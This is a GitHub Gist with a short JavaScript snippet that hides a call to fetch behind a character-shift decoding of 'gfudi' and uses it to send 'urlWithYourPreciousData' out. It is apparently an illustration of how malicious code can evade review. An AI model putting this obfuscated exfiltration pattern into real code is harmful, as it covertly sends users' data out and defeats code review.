Skip to content

Instantly share code, notes, and snippets.

@davidgilbertson
Created January 7, 2018 04:24
Show Gist options
  • Select an option

  • Save davidgilbertson/82e55dc09812d459bfdbe5ce1dbddff4 to your computer and use it in GitHub Desktop.

Select an option

Save davidgilbertson/82e55dc09812d459bfdbe5ce1dbddff4 to your computer and use it in GitHub Desktop.
const i = 'gfudi';
const k = s => s.split('').map(c => String.fromCharCode(c.charCodeAt() - 1)).join('');
self[k(i)](urlWithYourPreciousData);
@domvo
Copy link

domvo commented May 10, 2020

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment